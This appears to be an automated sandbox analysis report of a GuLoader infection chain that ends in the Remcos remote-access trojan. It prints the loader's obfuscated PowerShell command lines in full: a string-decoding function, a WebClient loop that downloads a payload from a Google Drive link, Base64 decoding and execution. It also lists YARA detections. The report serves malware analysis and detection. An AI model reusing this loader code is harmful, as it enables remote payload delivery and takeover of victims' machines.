Und0Ri g Af (rystWRegniG ienAvand tomo edewmalps Noa OverNGaliTBade Fora1 Lym0Ne f.Afkr0mong;Eris Cel WInq i FalnKuns6T yr4At,a;Trst S edx Bol6M ll4Udsk; Bu LaskrAfmnvLo g: Opg1 Sph3 Non4D ed.Befr0Ril,)Nabo Ind,GUba,eRaimcProskAgraokomf/ Age2 Std0Lode1Ta.e0 Beg0Valu1 nsa0 Ber1Fl l E oxFKa.aiBo,irXenoePe afMarkoBasixPou / Pha1Sa.t3Fib 4For,.Fron0';$Archery=Subrogate 'ton,UReciSAd leRechR alg-SnakaP,ecGHeroEVenenclert';$Reask=Subrogate 'MinihA sktMetatKontpPrefs Una:Trof/Irid/U,kadSuprrScomiA ervKompeTilf.BrangGuldoSkudoBal.g E,blAlg e dis.UnilcHalvo L tmsiff/circuRetrc Elf?KrydeIm.oxBebopti soB nzr BovtSfin=LabsdFlodo IrrwBillnWi dl Tilo VagaI oad ndl&FutuiH tbdefte=felt1 wa6Sup sDoomnbaksvIfre_,asm9 org5Nonnwglds0akvan .icE.usy4 pigL HerR AntQSubiiRamifNatubAlekdKrelrHrgeSb.sahServuAdinJMahjPChi.1 ,neXHubmqZarev FidVKnleyB.dvR';$Brandfarempolder=Subrogate 'Ster>';$Majestternes=Subrogate ' caI,apeeAnimx';$Pyroman='Myope';$Frontalitetens='\Fugtservietter.Her';Elektriseringers (Subrogate 'Stig$ illgstill,azzOMesoBTrllAOhmal S.a: umsNeigTDemoy SuirFor IBargnAnteG UbeSP hlaSubsF arsdcitiEf.sklAngaIShanNIndrg C aERigen,quisskan=Begn$Fa oeOx dNPalaVChiv:KommaThysPFlopp undDMacrABirgTPhonaNonr+Lned$AmfefantoRSuppo GhanSke tKr.gaoutsl ejrI nretMicrEPap t.eske da NSt ds');Elektriseringers (Subrogate 'Vild$HusmGTrinlVinroTherbGabbAAraulE it:EfteAOmorSS ffPIndtH SpdAFedeL Rest ReteLapaRW,id=Pe c$ReforLoxoe .onAAnsvs gnaK on.SoloSHamrpChaslF geitusktTing(P.od$UnquB emorP esA Ax NR kodbre FPostaFibrr SekE TjeMLydlpLyssoKre L EthDSwarebu tR on)');Elektriseringers (Subrogate $Valutasats);$Reask=$Asphalter[0];$Fremgangsperiodernes=(Subrogate 'Taar$ XpagFunklsawmO bu.bGeo a,ahoL run:etagAFreiTKogeH flnE croOPrekLWraiOprokg SanYSt,k= dsND odEIndtwInem- UneOSkr BauntJ ,ineFingcAnfrtCand lluSPompYStenSMartTDiskEDa,dmUnun.Peri$Hamms AfgtTr la PorAUndeHLangJDde dHeweEJunerF.es2Munt1 Ent1');Elektriseringers ($Fremgangsperiodernes);Elektriseringers (Subrogate ' Opl$ FinACo,otSalahbedye 
B,coM telSkkeoRig gupl yMaso.huldHLateeAfchaCoutd UndeMatrrDia sMira[Dece$SateAPrebr padcBr ghS ikeTranrpokayBown] k a=Ttyf$IndeD .psaUnsctBgeraPrudfPan i.amalStan7,orp9');$Thermoses=Subrogate 'pa t$PrelAModit Ve hNosteForloDimelEct oElitgSygeyStue.StteDSandoGte wSpannMonolSikkoFolkaAdmidFi iF O eiNyphlsyfieStor(Ditt$ totR SameCompaSejosOutpkPort,Bdg,$ urG TeglBaa.oBur,zFor eGibbsSint)';$Glozes=$Styringsafdelingens;Elektriseringers (Subrogate 'Subt$DalegUnculGin,OPo oBAfleaRed.lRewa:SolldVe,iI IndmQuizEFjeltAmnehGadgY ettL.rykbR veEMag nUdd Z cieBeren NyleNick=,adn( dittPatreFritsJgertDiap-VandPDespaBeritCillH dvi In $Jvn.gKum LDisco ronzTatteAnssSSted)');while (!$Dimethylbenzene) {Elektriseringers (Subrogate 'S um$ Lr gUnlilNon.o S obFr.earefelMile:UnprFMonooArtirMorrc MeniCatep KaciNonfaMagllBrat=Dren$Re sn SysoConjni bjiReinn middzi buStrks BintApprrRadiiBr.gaCalclpr.gi.ienzPreee Hydd') ;Elektriseringers $Thermoses;Elektriseringers (Subrogate 'Frsl[ ChoTSidehPlasRP,ssEcrueaAd idOdalI FinnSeerGPleu.D ciTAccehObexrDip.EAu iaBru D Spn]Tamp:Maza: ApoSSatcl Bede A,seNu,epPedi(Eksp4Iskl0Pe v0Hard0prec)');Elektriseringers (Subrogate 'Mi.d$ QuigAr nlDirio Skrb Pela FoulUnde:SuppDParaiQuatmAthieJin TPa rhTranyBarklbuncbHundEAmp.N .etz orEKe,inToadESubc=Over( RedTUnfaEt.inSBrgetByra-LogrPTetrASemiT Neuh egt Sco$Forsg TidlCestOFremZRehae Da SGass)') ;Elektriseringers (Subrogate 'Cook$NoneGGrntL,onpoVentbspecaDisclUdgy: Udgk,agtv atrIHem nAreoD.verE dmi= Ele$OrthGAramLRealob,haBP ocaKlasL Amn: cirr andASt vVSavnNUgeniFarmnLevngU.dy+Forr+Auto%Side$SlikaGau sDienpZygoh bagAFabrLN.utTS ksEtalerPoss.Tr sC Lu o PopUtungNUnsot') ;$Reask=$Asphalter[$kvinde]}$Belemringen=344979;$Altsaxer=31350;Elektriseringers (Subrogate ' .id$ A tGForsL D pOPhotBDe.gAForsl E o: Kont NedHU,reiS droUnnuR labEUdtrsTh,aOTo,prEuphc J aI DetNUndeO UnfLAcet Rege=Gran SupeGPante traTUddi-Tro cB owO hjen Ko,tKnale edeNudpoT Sal ,hii$Li egMetalLektO edfZUnprETin S');Elektriseringers (Subrogate 'drue$Uefag 
Legl Mi oLafgbFo ka InhlWhis:SentEi dokWoodsMentpPlaseDetndOegei Ov t Jugr usteBanenStansEiv Fjsi= rea L ve[ParaSG atySammsFirpt rste Trum Wat.Sh.dC KogoTuranSurvvUnsieHestr Su t Rot]Slip:Unre:TabaFLyserhaemo.ogemPrenB ,oraUnivsMenoeSkuf6Vans4U spSOttetparcrFulniM ssnDes gc,ll(Pree$MinoTSalmhSyntiFal oLater P.leKorasVillo DunrWin cAzt,iUnnena looNed lDyre)');Elektriseringers (Subrogate ' Fus$Ung g KulLHalvOG,beb SkjASemtLOpre:Zo gk UnsV Mg i BagvIn eaSmalLPe.iE ompRIncrEIndrsPerj Coun=S yr Tap [PolysTentyHitssThretFedtE D iM spe. KomtAutoEUnexx Ur.TLary.C,roeAgnoNGeomCRaaboBangdIn iibistnUdl gBr k] Int:Bis,:EloxaprskS,osec boniSe eI Reh.Armeg Bl E,ydbt ClaSNympTEpicrAdv iIdioN unnG Me ( s.n$ ksE.plakPionsU.eepJuleE B.uDMa uIDukstKambRS,areBlteN ors L,e)');Elektriseringers (Subrogate ' W.n$HjemG InvLE seoRehob Un AHilsL Kik:fleaoGe aLP eiFSacrENgstr HilT UtrS San= Mo $Pun K IntV.issi KrlvSputAPeraLHilleIndeRAss,EFo.ss til.b nbSRefoUConsBfasts raT frsrSvumICephNphenG Fis(P.rr$D spBAvisE nelGloeEMycemDataRGe tiO poNforsgOrthETelenLeds,lysk$.ortaBorgLF skTAntisDeonAVentXgoa E NonR U.h)');Elektriseringers $Olferts;"
                                                                                        Imagebase:0x7ff6ec5a0000
                                                                                        File size:452'608 bytes
                                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                        Has elevated privileges:false
                                                                                        Has administrator privileges:false
                                                                                        Programmed in:C, C++ or other language
                                                                                        Yara matches:
                                                                                        • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000004.00000002.1401976050.000002A9C69D6000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                        Reputation:high
                                                                                        Has exited:true

                                                                                        Target ID:5
                                                                                        Start time:14:15:02
                                                                                        Start date:12/03/2025
                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                        Imagebase:0x7ff642da0000
                                                                                        File size:862'208 bytes
                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                        Has elevated privileges:false
                                                                                        Has administrator privileges:false
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:true

                                                                                        Target ID:6
                                                                                        Start time:14:15:09
                                                                                        Start date:12/03/2025
                                                                                        Path:C:\Windows\System32\svchost.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                                        Imagebase:0x7ff7c8b00000
                                                                                        File size:55'320 bytes
                                                                                        MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:false

                                                                                        Target ID:13
                                                                                        Start time:14:15:25
                                                                                        Start date:12/03/2025
                                                                                        Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "echo $Postejens; function Subrogate($plankevrks){$Brandfare=4;do{$Hindbrmarmeladers+=$plankevrks[$Brandfare];$Brandfare+=5;$Superfunction=Format-List} until(!$plankevrks[$Brandfare])$Hindbrmarmeladers}function Elektriseringers($Spegeskinkens){ .($Majestternes) ($Spegeskinkens)}$Staahjder211=Subrogate 'solfnFornETroutBech. samW';$Staahjder211+=Subrogate 'Unove ForByewsC entLUninIMeriETrauNOrgaT';$Datafil79=Subrogate 'EngiM TiloDe,azhac i a,vlhag,l oma.rdi/';$fireetageshusenes=Subrogate 'FermT Deslent sSpec1Cond2';$Valutasats='Viab[Farrn.nine Tl T V n.TvisS Plae T.tRcin VTalli ndiCBeslePsykPSto oCaprILechNA.sltD riM K maSpirNUnclaMel g.dseeBrudrS,ov]Evan:Comm:strasprece Diac A tU disR BekiForsT Fo,y IntPIdeaRSlipoFlytTRhodoLedeC B.oo FejLAn u= ndh$UdlifLiteIfi.kr Da E Tr,E UndtM ewAS arGlat E uels erqhDydsuTilsSShreeLevenStevEEspis';$Datafil79+=Subrogate 'Klan5B ll. 
                                                                                        Imagebase:0x7ff7c8b00000
                                                                                        File size:433'152 bytes
                                                                                        MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                        Has elevated privileges:false
                                                                                        Has administrator privileges:false
                                                                                        Programmed in:C, C++ or other language
                                                                                        Yara matches:
                                                                                        • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 0000000D.00000002.1882393823.00000000085B0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 0000000D.00000002.1867994553.0000000005785000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 0000000D.00000002.1882574423.000000000B684000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                        Reputation:high
                                                                                        Has exited:true

                                                                                        Target ID:14
                                                                                        Start time:14:15:25
                                                                                        Start date:12/03/2025
                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                        Imagebase:0x7ff642da0000
                                                                                        File size:862'208 bytes
                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                        Has elevated privileges:false
                                                                                        Has administrator privileges:false
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:true

                                                                                        Target ID:15
                                                                                        Start time:14:16:13
                                                                                        Start date:12/03/2025
                                                                                        Path:C:\Windows\SysWOW64\msiexec.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:"C:\Windows\SysWOW64\msiexec.exe"
                                                                                        Imagebase:0x460000
                                                                                        File size:59'904 bytes
                                                                                        MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                                        Has elevated privileges:false
                                                                                        Has administrator privileges:false
                                                                                        Programmed in:C, C++ or other language
                                                                                        Yara matches:
                                                                                        • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000F.00000002.2197846460.000000000A662000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                        Reputation:high
                                                                                        Has exited:true

                                                                                        Target ID:21
                                                                                        Start time:14:16:47
                                                                                        Start date:12/03/2025
                                                                                        Path:C:\Windows\SysWOW64\msiexec.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:"C:\Windows\System32\msiexec.exe"
                                                                                        Imagebase:0x460000
                                                                                        File size:59'904 bytes
                                                                                        MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:true
